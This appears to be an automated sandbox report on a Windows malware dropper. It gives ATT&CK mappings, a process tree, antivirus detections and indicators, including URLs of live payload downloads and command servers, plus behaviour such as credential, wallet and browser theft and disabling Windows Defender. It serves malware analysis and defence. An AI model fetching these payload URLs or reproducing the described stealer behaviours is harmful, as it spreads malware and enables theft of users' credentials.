      Source: Yara match File source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.unpack, type: UNPACKEDPE

      Mitre Att&ck Matrix

The matrix is listed here by tactic (one column of the original table per entry). Numbers following a technique name are the signature-count badges as they appear in the report; techniques without a number carry none.

• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
• Execution: Native API (1); Command and Scripting Interpreter (2); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
• Persistence: DLL Side-Loading (11); Application Shimming (1); Registry Run Keys / Startup Folder (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
• Privilege Escalation: DLL Side-Loading (11); Application Shimming (1); Bypass User Access Control (1); Process Injection (512); Registry Run Keys / Startup Folder (1); Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
• Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (31); Software Packing (31); DLL Side-Loading (11); Bypass User Access Control (1); Masquerading (12); Virtualization/Sandbox Evasion (161); Process Injection (512); Rundll32 (1); Right-to-Left Override
• Credential Access: OS Credential Dumping (1); Credential API Hooking (1); Input Capture (2); Credentials in Registry (1); LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
• Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (15); System Information Discovery (67); Query Registry (1); Security Software Discovery (461); Virtualization/Sandbox Evasion (161); Process Discovery (14); System Owner/User Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1)
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
• Collection: Archive Collected Data (1); Data from Local System (31); Credential API Hooking (1); Input Capture (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
• Command and Control: Ingress Tool Transfer (15); Encrypted Channel (22); Non-Application Layer Protocol (5); Application Layer Protocol (126); Proxy (1); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
• Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
• Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
• Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph

Behavior Graph ID: 439281, Sample: yevbZfdCqR.exe, Startdate: 23/06/2021, Architecture: WINDOWS, Score: 100

The graph is given here as a process tree. Under each process: the domains/IPs it contacted, the files it dropped, the signatures matched on it and the processes it started. Numbers in parentheses after a process name are the graph's badges for created registry values and created files.

Start
• DNS/IP: email.yg9.me
• Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 19 other signatures
• Started: yevbZfdCqR.exe (4 / 49); svchost.exe; explorer.exe

yevbZfdCqR.exe
• DNS/IP: jom.diregame.live; 136.144.41.152, 49735, 80 WORLDSTREAMNL Netherlands; 10 other IPs or domains
• Dropped: C:\Users\...\ulVElw2mPS2j3QKCM9gOxM3j.exe, PE32; C:\Users\...\oO2a8x5RXTHKygCXkT7syx3J.exe, PE32; C:\Users\...\gUlDp5No64Xfcgfbo3IlvG0y.exe, PE32; 27 other files (12 malicious)
• Signatures: Drops PE files to the document folder of the user; Creates HTML files with .exe extension (expired dropper behavior); Performs DNS queries to domains with low reputation; Disable Windows Defender real time protection (registry)
• Started: gDoWsyv4ZlqhjBKjyfkjR1BY.exe; M5uLwz0sXvZcR89u_43Nm9v8.exe; ZteJ0k9a2sM9jXcC3SndaipD.exe (86); 12 other processes

svchost.exe
• Signatures: Sets debug register (to hijack the execution of another thread); Modifies the context of a thread in another process (thread injection)

gDoWsyv4ZlqhjBKjyfkjR1BY.exe
• Dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32; C:\Users\user\AppData\Local\...\System.dll, PE32; 131 other files (none is malicious)

M5uLwz0sXvZcR89u_43Nm9v8.exe
• Dropped: C:\Program Files (x86)\...\md8_8eus.exe, PE32; C:\Program Files (x86)\Company\...\jooyu.exe, PE32; C:\Program Files (x86)\...\jingzhang.exe, PE32; 2 other files (1 malicious)
• Started: md8_8eus.exe; jooyu.exe; jingzhang.exe; file4.exe

ZteJ0k9a2sM9jXcC3SndaipD.exe
• DNS/IP: 159.69.20.131 HETZNER-ASDE Germany; sergeevih43.tumblr.com 74.114.154.22 AUTOMATTICUS Canada
• Dropped: 6 other files (none is malicious)
• Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Crypto Currency Wallets

12 other processes (started by yevbZfdCqR.exe)
• DNS/IP: g-partners.top 138.68.187.227 DIGITALOCEAN-ASNUS United States; g-partners.in; 5 other IPs or domains
• Dropped: 15 other files (none is malicious)
• Signatures: DLL reload attack detected; May check the online IP address of the machine; Tries to harvest and steal browser information (history, passwords, etc); Injects a PE file into a foreign processes
• Started: MQ5u6_H0cs9EUXsesfNpGUNc.exe; rundll32.exe; Browzar.exe; 6 other processes

md8_8eus.exe
• DNS/IP: 101.36.107.74 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK China; iplogger.org
• Dropped: C:\Users\user\Documents\...\md8_8eus.exe, PE32
• Signatures: Tries to harvest and steal browser information (history, passwords, etc)

jooyu.exe
• DNS/IP: www.facebook.com; star-mini.c10r.facebook.com; ip-api.com
• Started: jfiag3g_gg.exe; jfiag3g_gg.exe

jingzhang.exe
• Dropped: C:\Users\user\AppData\Local\...\install.dll, PE32; C:\Users\user\AppData\...\Newtonsoft.Json.dll, PE32
• Started: conhost.exe

MQ5u6_H0cs9EUXsesfNpGUNc.exe
• Dropped: C:\Users\user\AppData\Local\Temp\AE30.tmp, PE32
• Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Renames NTDLL to bypass HIPS; Checks if the current machine is a virtual machine (disk enumeration)

rundll32.exe
• Signatures: Writes to foreign memory regions; Allocates memory in foreign processes

Browzar.exe
• DNS/IP: www.browzar.com 139.59.176.201 DIGITALOCEAN-ASNUS Singapore

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Submitted file

Source | Detection | Scanner | Label
yevbZfdCqR.exe | 68% | Virustotal |
yevbZfdCqR.exe | 31% | Metadefender |
yevbZfdCqR.exe | 69% | ReversingLabs | Win32.Trojan.Bsymem
Dropped files

Source | Detection | Scanner | Label
C:\Program Files (x86)\Company\NewProduct\jooyu.exe | 100% | Avira | TR/AD.JazoStealer.znvpf
C:\Program Files (x86)\Company\NewProduct\file4.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | 100% | Avira | HEUR/AGEN.1114952
C:\Program Files (x86)\Company\NewProduct\jooyu.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Company\NewProduct\file4.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Browzar\Browzar.exe | 3% | Metadefender |
C:\Program Files (x86)\Browzar\Browzar.exe | 2% | ReversingLabs |
C:\Program Files (x86)\Browzar\Uninstall.exe | 3% | ReversingLabs |
C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | 4% | ReversingLabs |
C:\Program Files (x86)\Company\NewProduct\file4.exe | 19% | Metadefender |
C:\Program Files (x86)\Company\NewProduct\file4.exe | 79% | ReversingLabs | Win32.Downloader.BadOffer
C:\Program Files (x86)\Company\NewProduct\jingzhang.exe | 29% | Metadefender |
C:\Program Files (x86)\Company\NewProduct\jingzhang.exe | 79% | ReversingLabs | Win32.Trojan.Tnega
C:\Program Files (x86)\Company\NewProduct\jooyu.exe | 44% | Metadefender |
C:\Program Files (x86)\Company\NewProduct\jooyu.exe | 90% | ReversingLabs | Win32.Trojan.CookiesStealer
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | 34% | Metadefender |
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | 93% | ReversingLabs | Win32.Infostealer.Passteal
C:\Program Files (x86)\lighteningplayer\connection.dll | 0% | Metadefender |
C:\Program Files (x86)\lighteningplayer\connection.dll | 0% | ReversingLabs |
C:\Program Files (x86)\lighteningplayer\data_load.exe | 0% | Metadefender |
C:\Program Files (x86)\lighteningplayer\data_load.exe | 0% | ReversingLabs |
C:\Program Files (x86)\lighteningplayer\libssp-0.dll | 0% | Metadefender |
C:\Program Files (x86)\lighteningplayer\libssp-0.dll | 0% | ReversingLabs |
Unpacked PE files

Source | Detection | Scanner | Label
41.0.jfiag3g_gg.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ULPM.Gen
1.3.yevbZfdCqR.exe.5bc4e20.12.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.3.yevbZfdCqR.exe.5b28ec0.54.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.3.yevbZfdCqR.exe.5bc4e20.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.28.unpack | 100% | Avira | HEUR/AGEN.1131354
26.2.jooyu.exe.390000.0.unpack | 100% | Avira | TR/Redcap.ahesa
26.2.jooyu.exe.40f110.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
41.2.jfiag3g_gg.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ULPM.Gen
13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.c6f110.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
21.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1142322
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.2.unpack | 100% | Avira | HEUR/AGEN.1131354
13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.c6f110.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.6.unpack | 100% | Avira | HEUR/AGEN.1131354
35.2.md8_8eus.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.3.yevbZfdCqR.exe.4f393c3.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.2.yevbZfdCqR.exe.4ee31a0.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.bf0000.0.unpack | 100% | Avira | TR/Redcap.ahesa
30.1.MQ5u6_H0cs9EUXsesfNpGUNc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.c9d110.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
33.0.jfiag3g_gg.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ULPM.Gen
26.0.jooyu.exe.40f110.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.3.yevbZfdCqR.exe.5b65d60.13.unpack | 100% | Avira | TR/Patched.Ren.Gen
6.0.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack | 100% | Avira | HEUR/AGEN.1135860
36.0.jfiag3g_gg.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ULPM.Gen
36.2.jfiag3g_gg.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ULPM.Gen
25.2.file4.exe.6e0000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2
20.2.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.41bf9a.3.unpack | 100% | Avira | TR/Dropper.Gen
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.14.unpack | 100% | Avira | HEUR/AGEN.1131354
1.3.yevbZfdCqR.exe.5b02020.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
25.2.file4.exe.6f0000.4.unpack | 100% | Avira | TR/Dropper.Gen
20.1.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.3.yevbZfdCqR.exe.5aeefe0.17.unpack | 100% | Avira | TR/Patched.Ren.Gen
37.0.svchost.exe.1da29cd0000.4.unpack | 100% | Avira | TR/ATRAPS.Gen2
25.2.file4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
25.0.file4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
35.0.md8_8eus.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
21.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.9e0000.1.unpack | 100% | Avira | HEUR/AGEN.1135860
6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack | 100% | Avira | HEUR/AGEN.1135860
21.0.YX7wpjoMI0vZoMwVbFh9XNIC.exe.9e0000.0.unpack | 100% | Avira | HEUR/AGEN.1135860
29.0.Browzar.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
26.2.jooyu.exe.43d110.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
26.0.jooyu.exe.390000.0.unpack | 100% | Avira | TR/Redcap.ahesa
1.3.yevbZfdCqR.exe.5e52f40.20.unpack | 100% | Avira | TR/Patched.Ren.Gen
11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.20.unpack | 100% | Avira | HEUR/AGEN.1131354
16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.1.unpack | 100% | Avira | HEUR/AGEN.1131354
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.13.unpack | 100% | Avira | HEUR/AGEN.1131354
33.2.jfiag3g_gg.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ULPM.Gen
20.2.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.421b96.1.unpack | 100% | Avira | TR/Dropper.Gen
16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.11.unpack | 100% | Avira | HEUR/AGEN.1131354
13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.bf0000.6.unpack | 100% | Avira | TR/Redcap.ahesa
13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.c9d110.9.unpack | 100% | Avira | TR/Patched.Ren.Gen
26.0.jooyu.exe.43d110.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
Domains

Source | Detection | Scanner | Label
nicepricingsaleregistration.com | 7% | Virustotal |
jom.diregame.live | 8% | Virustotal |
email.yg9.me | 0% | Virustotal |
URLs

Source | Detection | Scanner | Label
https://jom.diregame.live:80/m | 0% | Avira URL Cloud | safe
https://iplis.ru/1G8Fx7.mp3~ | 0% | Avira URL Cloud | safe
http://159.69.20.131/msvcp140.dll | 0% | Avira URL Cloud | safe
http://136.144.41.133/WW/file1.exeuments | 0% | Avira URL Cloud | safe
http://136.144.41.152/base/api/getData.phpf= | 0% | Avira URL Cloud | safe
http://159.69.20.131/vcruntime140.dllYYC: | 0% | Avira URL Cloud | safe
http://flamkravmaga.com/pub4.exehttp://185.20.227.194/install.exehttps://cdn.discordapp.com/attachme | 0% | Avira URL Cloud | safe
http://tempuri.org/ | 0% | Avira URL Cloud | safe
http://136.144.41.152/base/api/getData.phpeS | 0% | Avira URL Cloud | safe
https://d.dirdgame.live/userf/2201/351d2d0bb9a0df4a490dafc033194e7d.exeLMEM | 0% | Avira URL Cloud | safe
http://159.69.20.131/ | 0% | Avira URL Cloud | safe
http://136.144.41.133/WW/file2.exeC: | 0% | Avira URL Cloud | safe
http://136.144.41.133/WW/file8.exe | 100% | Avira URL Cloud | malware
http://136.144.41.133/WW/file7.exeumentsN13eHI1fs1RwfU6rt0L4y8dk.exe | 0% | Avira URL Cloud | safe
http://136.144.41.133/ | 0% | Avira URL Cloud | safe
https://2makestorage.comidna: | 0% | Avira URL Cloud | safe
http://136.144.41.152/KB | 0% | Avira URL Cloud | safe
http://marsdevelopmentsftwr.com/data/data.7z | 100% | Avira URL Cloud | malware
http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css | 0% | URL Reputation | safe
http://uyg5wye.2ihsfa.com/api/?sid=87819&key=00a1b912da62d35571d16217e9d5ff8f | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937 | 0% | URL Reputation | safe
http://136.144.41.133/WW/file8.exeC: | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5 | 0% | URL Reputation | safe
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy | 0% | Avira URL Cloud | safe
http://136.144.41.133/WW/file1.exeC: | 0% | Avira URL Cloud | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e | 0% | Avira URL Cloud | safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe
http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe | 0% | Avira URL Cloud | safe
http://136.144.41.152/base/api/getData.phpM | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
http://136.144.41.133/WW/file1.exe1 | 0% | Avira URL Cloud | safe
https://pki.goog/repository/0 | 0% | URL Reputation | safe
http://g-partners.top/stats/remember.php?pub=mixinte&user=user | 0% | Avira URL Cloud | safe
http://fairsence.com/campaign/?type=err&source=campaign1&pinf1= | 0% | Avira URL Cloud | safe
http://https://_bad_pdb_file.pdb | 0% | Avira URL Cloud | safe
http://136.144.41.152/base/api/getData.phpF | 0% | Avira URL Cloud | safe
https://sndvoices.comhttps://spolaect.infoimage: | 0% | Avira URL Cloud | safe
http://136.144.41.133/WW/file6.exehttp://136.144.41.133/WW/file7.exe | 0% | Avira URL Cloud | safe
http://136.144.41.133/WW/file7.exeC: | 0% | Avira URL Cloud | safe
http://136.144.41.152/base/api/getData.phpq | 0% | Avira URL Cloud | safe
http://136.144.41.152/base/api/getData.phps | 0% | Avira URL Cloud | safe
https://blockchain.infoindex | 0% | URL Reputation | safe
http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
http://136.144.41.133/WW/file4.exe | 100% | Avira URL Cloud | malware
http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | URL Reputation | safe
http://136.144.41.133/server.txt | 0% | Avira URL Cloud | safe
Domains and IPs

Name | IP | Active | Malicious | Antivirus Detection | Reputation
star-mini.c10r.facebook.com | 157.240.17.35 | true | false | | high
nicepricingsaleregistration.com | 89.221.213.3 | true | true | | unknown
jom.diregame.live | 104.21.65.45 | true | false | | unknown
freeprivacytoolsforyou.xyz | 212.80.219.75 | true | true | | unknown
cdn.discordapp.com | 162.159.134.233 | true | false | | high
iplogger.org | 88.99.66.31 | true | false | | high
www.browzar.com | 139.59.176.201 | true | false | | high
sergeevih43.tumblr.com | 74.114.154.22 | true | false | | high
email.yg9.me | 198.13.62.186 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | false | | high
uyg5wye.2ihsfa.com | 88.218.92.148 | true | false | | unknown
g-partners.top | 138.68.187.227 | true | true | | unknown
d.dirdgame.live | 104.21.59.252 | true | false | | unknown
iplis.ru | 88.99.66.31 | true | false | | unknown
www.facebook.com | unknown | unknown | false | | high
flamkravmaga.com | unknown | unknown | true | | unknown
g-partners.in | unknown | unknown | true | | unknown
pp.exe | unknown | unknown | true | | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.browzar.com/start/css/ie7.css | false | | high
http://159.69.20.131/msvcp140.dll | false | Avira URL Cloud: safe | unknown
http://136.144.41.133/WW/file8.exe | true | Avira URL Cloud: malware | unknown
http://uyg5wye.2ihsfa.com/api/?sid=87819&key=00a1b912da62d35571d16217e9d5ff8f | false | Avira URL Cloud: safe | unknown
http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe | false | Avira URL Cloud: safe | unknown
http://g-partners.top/stats/remember.php?pub=mixinte&user=user | true | Avira URL Cloud: safe | unknown
http://136.144.41.133/WW/file4.exe | true | Avira URL Cloud: malware | unknown
http://136.144.41.133/server.txt | false | Avira URL Cloud: safe | unknown
URLs from memory and binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://assets.tumblr.com/assets/scripts/pre_tumblelog.js?_v=b9f848c06fcba7eaf305d4a7cb7a1b98 | oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmp | false | | high
https://jom.diregame.live:80/m | yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.browzar.com/start/?v=2000uM | Browzar.exe, 0000001D.00000002.1022622220.0000000000854000.00000004.00000020.sdmp | false | | high
https://duckduckgo.com/ac/?q= | oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmp | false | | high
https://iplis.ru/1G8Fx7.mp3~ | yevbZfdCqR.exe, 00000001.00000002.754205295.0000000005EB7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.browzar.com/start/?v=2000....gst | Browzar.exe, 0000001D.00000003.736533690.0000000005D04000.00000004.00000001.sdmp | false | | high
https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeL | Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmp | false | | high
https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeJ | yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmp | false | | high
https://messenger.com/ | LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.745782059.000000000176F000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmp | false | | high
https://www.browzar.com | yevbZfdCqR.exe, 00000001.00000003.658257758.0000000005DE1000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.993457562.00000000020A0000.00000004.00000001.sdmp | false | | high
http://136.144.41.133/WW/file1.exeuments | yevbZfdCqR.exe, 00000001.00000003.650721948.0000000004F72000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://136.144.41.152/base/api/getData.phpf= | yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://159.69.20.131/vcruntime140.dllYYC: | oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.tumblr.com/client/prod/standalone/blog-network-npf/index.build.css?_v=a6c4ad40cdc663a | oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmp | false | | high
https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeC | yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmp | false | | high
http://flamkravmaga.com/pub4.exehttp://185.20.227.194/install.exehttps://cdn.discordapp.com/attachme | yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/ | YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://136.144.41.152/base/api/getData.phpeS | yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | jfiag3g_gg.exe, 00000017.00000002.728579676.0000000000197000.00000004.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.965805266.000000000019A000.00000004.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.970486812.000000000019A000.00000004.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.987882908.000000000019A000.00000004.00000001.sdmp | false | | high
https://cdn.discordapp.com:80/attachments/855697945679888404/856207959917985862/file3s.bmp4 | yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmp | false | | high
https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpLMEM | Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmp | false | | high
http://www.browzar.com/start/?v=2000thod | Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmp | false | | high
https://d.dirdgame.live/userf/2201/351d2d0bb9a0df4a490dafc033194e7d.exeLMEM | Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe2 | yevbZfdCqR.exe, 00000001.00000003.657194848.0000000005EB5000.00000004.00000001.sdmp | false | | high
https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe | yevbZfdCqR.exe, 00000001.00000003.657194848.0000000005EB5000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.753660933.0000000005B38000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmp | false | | high
https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe. | yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmp | false | | high
http://159.69.20.131/ | oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.browzar.com/start/?v=2000ww.browzar.com/start/?v=2000d.cookie | Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmp | false | | high
